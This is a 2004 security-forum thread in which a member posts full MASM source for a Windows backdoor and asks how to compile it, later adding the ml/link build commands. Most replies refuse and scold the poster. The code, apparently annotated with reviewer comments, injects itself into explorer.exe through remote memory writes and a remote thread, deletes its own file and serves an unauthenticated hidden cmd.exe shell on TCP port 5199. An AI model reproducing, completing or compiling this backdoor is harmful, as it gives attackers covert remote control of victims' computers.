-
March 8th, 2004, 12:14 PM
#1
Member
ASM backdoor
Guys, I'm NOT very good with ASM / C (I have a bit of a different approach).
How could I compile the following code into an executable PE (.exe), or convert it into compilable C code?
--------------code-----------------------------
;When this EXE is run it will create a thread
;inside of explorer.exe that listens on port 5199
;for connections. Then the EXE deletes itself
;leaving no traces.
;Each new connection is redirected to a spawned
;cmd.exe process until the next reboot.
;linker options: /base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib
.data
; --- Initialised data. The linker line in the header merges .data into .text and
; marks it RWX, so the whole image is one writable+executable section.
; NOTE(review): that single RWX section is a strong static indicator on its own;
; a normally built image keeps .data separate and non-executable.
szTarget byte 'Shell_TrayWnd', 0 ; window class looked up with FindWindow; its owning process is the injection target
szUser32 byte 'user32.dll', 0 ; loaded inside the target by Shelld
szWinsock byte 'wsock32.dll', 0 ; loaded inside the target by Shelld
szCommandLine byte 'cmd.exe', 0 ; command line handed to CreateProcess for every accepted connection
szSharedData byte 261 dup (0) ; 261-byte path buffer: start stores this EXE's own path here (GetModuleFileName) so the copy in the target can DeleteFile it
.data?
hModule dword ? ; image base of this EXE (GetModuleHandle(0)); also the address requested in the target
hNewModule dword ? ; address returned by VirtualAllocEx in the target (never compared with hModule)
hProcess dword ? ; PROCESS_ALL_ACCESS handle to the target process
dwSize dword ? ; SizeOfImage read from our own optional header = bytes copied
dwPid dword ? ; PID of the process owning the Shell_TrayWnd window
dwBytesWritten dword ? ; out-param of WriteProcessMemory (never checked)
dwTid dword ? ; thread id out-param of CreateRemoteThread (never used)
WSAData WSADATA <> ; filled by WSAStartup in Shelld
.code
;-----------------------------------------------------------------------
; ShellClient(dwSock)
; One thread per accepted connection (created from Shelld). Spawns a
; hidden cmd.exe with stdin/stdout/stderr redirected through two
; anonymous pipes and relays raw bytes between the pipes and the socket
; until cmd.exe exits or the socket errors/closes.
; There is no authentication of any kind: whoever connects gets the shell.
; In:   dwSock = connected SOCKET (the thread parameter)
; Out:  nothing; closes dwSock and the two pipe ends it still owns.
; NOTE(review): the return values of CreatePipe/CreateProcess/send are
; never checked, and processinfo.hProcess / processinfo.hThread are
; never closed, so every session leaks two handles in the host process.
;-----------------------------------------------------------------------
ShellClient proc dwSock:dword
local sat:SECURITY_ATTRIBUTES
local hiRead:dword ; child-stdin pipe, read end (inherited by cmd.exe)
local hoRead:dword ; child-stdout pipe, read end (kept by us)
local hiWrite:dword ; child-stdin pipe, write end (kept by us)
local hoWrite:dword ; child-stdout pipe, write end (inherited by cmd.exe)
local startupinfo:STARTUPINFO
local processinfo:PROCESS_INFORMATION
local exitcode:dword
local buffer[1024]:byte ; single relay buffer used for both directions
local bytes:dword ; reused: first as the FIONBIO flag, then as byte counts
local available:dword ; total bytes pending in the stdout pipe (PeekNamedPipe)
local data:dword ; unused
; Inheritable handles so the child can use the pipe ends as its std handles.
mov sat.nLength, sizeof SECURITY_ATTRIBUTES
mov sat.lpSecurityDescriptor, 0
mov sat.bInheritHandle, TRUE
invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0
invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0
invoke GetStartupInfo, addr startupinfo
mov startupinfo.cb, sizeof STARTUPINFO
mov eax, hoWrite
mov startupinfo.hStdOutput, eax
mov startupinfo.hStdError, eax ; stdout and stderr share one pipe
mov eax, hiRead
mov startupinfo.hStdInput, eax
mov startupinfo.dwFlags, STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
mov startupinfo.wShowWindow, SW_HIDE ; no visible console window
; bInheritHandles=TRUE: the pipe ends (and any other inheritable handle in the host) are passed to cmd.exe.
; Detection note: a hidden cmd.exe whose std handles are pipes, parented by the host process, is the observable artefact here.
invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, addr processinfo
; Drop the child's ends on our side so pipe EOF can be observed.
invoke CloseHandle, hoWrite
invoke CloseHandle, hiRead
mov bytes, 1
invoke ioctlsocket, dwSock, FIONBIO, addr bytes ; non-blocking socket; the loop below polls it
.while TRUE
invoke Sleep, 1 ; 1 ms poll interval
invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode
.if exitcode != STILL_ACTIVE
.break ; cmd.exe has exited (e.g. the client typed "exit")
.endif
; Child stdout -> socket. PeekNamedPipe fills bytes (copied into buffer) and available (total pending) without consuming.
invoke PeekNamedPipe, hoRead, addr buffer, 1024, addr bytes, addr available, 0
.if bytes != 0
.if available > 1024
; More than one buffer pending: drain in 1024-byte chunks while reads keep coming back full.
.while bytes >= 1024
invoke Sleep, 1
invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
.if bytes != 0
invoke send, dwSock, addr buffer, bytes, 0 ; return value unchecked: a short send silently drops output
.endif
.endw
.else
invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
.if bytes != 0
invoke send, dwSock, addr buffer, bytes, 0 ; return value unchecked
.endif
.endif
.endif
; Socket -> child stdin.
invoke recv, dwSock, addr buffer, 1024, 0
.if eax == SOCKET_ERROR || eax == 0
invoke WSAGetLastError
.if eax == WSAEWOULDBLOCK
.continue ; nothing pending on the non-blocking socket
.else
; Real error, or peer closed (recv == 0 lands here unless the last error happens to be WSAEWOULDBLOCK): kill the shell.
invoke TerminateProcess, processinfo.hProcess, 0
.break
.endif
.else
mov edx, eax ; eax = bytes received; copied out because `addr buffer` on a local is presumably emitted through eax
invoke WriteFile, hiWrite, addr buffer, edx, addr bytes, 0 ; bytes go to cmd.exe stdin unmodified
.endif
.endw
invoke CloseHandle, hiWrite
invoke CloseHandle, hoRead
invoke closesocket, dwSock
ret
ShellClient endp
;-----------------------------------------------------------------------
; Shelld()
; Runs as a remote thread inside the process that owns Shell_TrayWnd
; (the image was copied to the same base it has here, so every data and
; proc address is valid unchanged). Deletes the original EXE file, then
; listens on TCP 5199 on all interfaces and hands each accepted
; connection to a new ShellClient thread. Never returns.
; NOTE(review): WSAStartup/socket/bind/listen results are not checked;
; if bind fails (port already taken) the loop still spins on accept once
; a second forever. Calling imports from the copied image assumes the IAT
; resolved in the dropper process is valid in the target, i.e. that
; kernel32/user32/wsock32 are mapped at the same addresses in both
; processes — TODO confirm for the intended platform.
;-----------------------------------------------------------------------
Shelld proc
local SockAddrIn:sockaddr_in
local dwSock:dword ; listening socket
local dwMode:dword ; FIONBIO flag
; "Self-delete": szSharedData holds the dropper's path, stored by start before the image was copied.
; Only the file on disk goes away; the listening port, the RWX copy of the image and every cmd.exe child stay observable.
invoke DeleteFile, addr szSharedData
; Make sure the DLLs referenced by the copied import table are mapped in this process.
invoke LoadLibrary, addr szUser32
invoke LoadLibrary, addr szWinsock
invoke WSAStartup, 101h, addr WSAData ; requests Winsock 1.1
invoke socket, PF_INET, SOCK_STREAM, 0
mov dwSock, eax
mov SockAddrIn.sin_family, AF_INET
invoke htons, 5199
mov SockAddrIn.sin_port, ax ; TCP 5199
mov SockAddrIn.sin_addr, INADDR_ANY ; every interface, not only loopback
invoke bind, dwSock, addr SockAddrIn, sizeof SockAddrIn
mov dwMode, 1
invoke ioctlsocket, dwSock, FIONBIO, addr dwMode ; non-blocking accept, polled below
invoke listen, dwSock, SOMAXCONN
@@:
; addrlen is passed as 0 (NULL) with a non-NULL addr; the peer address is presumably not filled in (verify against the Winsock docs) and is never used anyway.
invoke accept, dwSock, addr SockAddrIn, 0
.if eax != INVALID_SOCKET
mov edx, eax ; accepted socket, parked in edx before the next invoke
invoke CreateThread, 0, 0, addr ShellClient, edx, 0, 0 ; one ShellClient per connection, no cap
invoke CloseHandle, eax ; drop our handle; the thread keeps running
.endif
invoke Sleep, 1000 ; 1 s poll interval
jmp @B ; unconditional: the listener lives until the host process dies
ret ; unreachable
Shelld endp
;-----------------------------------------------------------------------
; Entry point (dropper side). Copies this whole image into the process
; owning the Shell_TrayWnd window at the *same* virtual address it
; occupies here (the /base:0x13140000 on the linker line is presumably
; chosen so that address is free in the target), starts Shelld there as
; a remote thread, then exits. This is the textbook
; OpenProcess / VirtualAllocEx(RWX) / WriteProcessMemory /
; CreateRemoteThread chain that process-injection detections key on.
; NOTE(review): no return value is checked anywhere in this block.
;-----------------------------------------------------------------------
start:
invoke GetModuleHandle, 0 ; our own image base
mov hModule, eax
mov edi, eax
; Walk our PE headers to read SizeOfImage (number of bytes to copy).
; NOTE(review): `assume editr ...` is not valid MASM syntax as written; given the
; `assume edi:NOTHING` below it reads like a transcription error for `assume edi:ptr ...`.
assume editr IMAGE_DOS_HEADER
add edi, [edi].e_lfanew ; -> IMAGE_NT_HEADERS
add edi, sizeof dword ; skip the PE signature
add edi, sizeof IMAGE_FILE_HEADER ; -> IMAGE_OPTIONAL_HEADER32
assume editr IMAGE_OPTIONAL_HEADER32
mov eax, [edi].SizeOfImage
mov dwSize, eax
assume edi:NOTHING
; Record our own path inside the image so the copy can delete the file from within the target (see Shelld).
invoke GetModuleFileName, 0, addr szSharedData, 261
; Target = process owning the taskbar window (explorer.exe according to the header comment).
invoke FindWindow, addr szTarget, 0
invoke GetWindowThreadProcessId, eax, addr dwPid
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, dwPid ; requires rights over the target; a NULL handle is not detected here
mov hProcess, eax
; Free whatever the target has at our base, then claim exactly that address so the copy needs no relocation.
invoke VirtualFreeEx, hProcess, hModule, 0, MEM_RELEASE
invoke VirtualAllocEx, hProcess, hModule, dwSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE ; RWX, non-image-backed private memory in another process
mov hNewModule, eax ; never compared with hModule; if the allocation landed elsewhere (or failed) the copy is useless
invoke WriteProcessMemory, hProcess, hNewModule, hModule, dwSize, addr dwBytesWritten
; Thread start address is Shelld's address in *this* image, valid in the target only because the copy sits at the same base.
invoke CreateRemoteThread, hProcess, 0, 0, addr Shelld, hModule, 0, addr dwTid
invoke ExitProcess, 0
end start
-----------------end code--------------------
-
March 8th, 2004, 01:19 PM
#2
The whole point of releasing this kind of "tool" in this form is to prevent n00bs from having yet another scriptkiddie tool.
Start by learning what assembler is and how, when and where to use it.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
March 8th, 2004, 01:59 PM
#3
I do not think you will get anyone here to help you write a backdoor, well, not openly at least
You do not explain your reasons, and even if you did, I wonder if people would really believe you.
I do hope you read the front page of this forum.............carefully?
I would point out that those who do not KNOW how to write malware get caught........for certain.
I agree with SirDice....................learn assembler, and then you will know
Take care, I think that you might need to?
-
March 8th, 2004, 02:10 PM
#4
*sigh* Let me help you write a tool that you will a) claim you wrote on your own to gain 31337 5+@+|_|5 with your skiddie buddies, b) that will be used to hamper my/others' security, and c) that will give you an ego the size of Texas. No thanks.
Re-read what this site is about. And since you don't know what you are doing, it's going to be a VERY short time before you're caught. Get up, go out and enjoy the sun; who knows when you won't be able to do that anymore...
Remember -
The ark was built by amateurs...
The Titanic was built by professionals.
-
March 8th, 2004, 06:26 PM
#5
Member
who's talking about lamers here.....I said that ASM is not my strong side....
here's the diffcult way of doing it....
anyway
:ml /c /coff backdor.asm
link /base:0x13140000 /filealign:0x200 /merge:.data=.text /section:.text,RWX /subsystem:windows /libpath:\masm32\lib backdoor.obj
any easy ways of doing it?
-
March 8th, 2004, 06:43 PM
#6
The reason you're being called out is not because you can't code in ASM; it's because of what you are trying to compile, buddy. If you don't know already, you are asking us to help you compile a skiddie tool. If you had asked for help in learning assembly, or help compiling some other legitimate program, I think people would have helped you. You said you are not that familiar with assembly, and to start off you are trying to compile a pre-coded backdoor program. Strange?? I think your intentions are not to learn assembly but only to get this program to compile and show off, or to try to crack into somebody's computer. Hope Bubba will be real nice to you. "Bubba who??" Your new room mate.
-
March 8th, 2004, 06:47 PM
#7
Member
lmao, you don't learn do you?
People have just bombed you telling you NOT to post this type of stuff in these forums. Yet you totally ignore all the advice given and continue this thread.
Read A Guide to AntiOnline and the world of security writen by Ennis
-
March 8th, 2004, 08:40 PM
#8
Like I said in another thread, hope your "knowledge" and "t00lz" help you when you are getting "hacked " by above-mentioned bubba
Remember -
The ark was built by amateurs...
The Titanic was built by professionals.
-
March 9th, 2004, 12:04 AM
#9
Senior Member
This situation is starting to get annoying.....on the one side those who came here to learn hacking to impress their friends (they are banned after two or three posts of this kind, after being flamed)....on the other side the 'good guys'...you are all so nice....you never did anything illegal, never used a backdoor, never used trojans or even scriptkiddie tools, always on the good side....in fact I cannot say anything to senior members because at least they know more than me and I sort of respect them....but what is going on with newbies? I mean, is there not a normal newbie out there? On the one side script kiddies, on the other angels???? What a f**k....anyway I don't think the intentions of karavay were bad at all..at least he may be trying to learn programming, not flame other people...anyway cheers, and don't be so quick to judge if you cannot help.....(that's particularly for newbies)
Is that the place where I am supposed to say sth clever and brilliant so that everybody understands how clever nice guy I am????
Screw you guys I am going home!-Kartman
-
March 9th, 2004, 03:28 PM
#10
Member
thanks tyfon !
Come on guys, what is this all about.....I mean, what is this site about........ ask yourself this burning question.......I didn't ask you how TO hack Microsoft, did I ... the question was how to compile the code....and I'm sure that half of you guys have copied the code .. next time I'll post the code without any comments on it!!!
-------------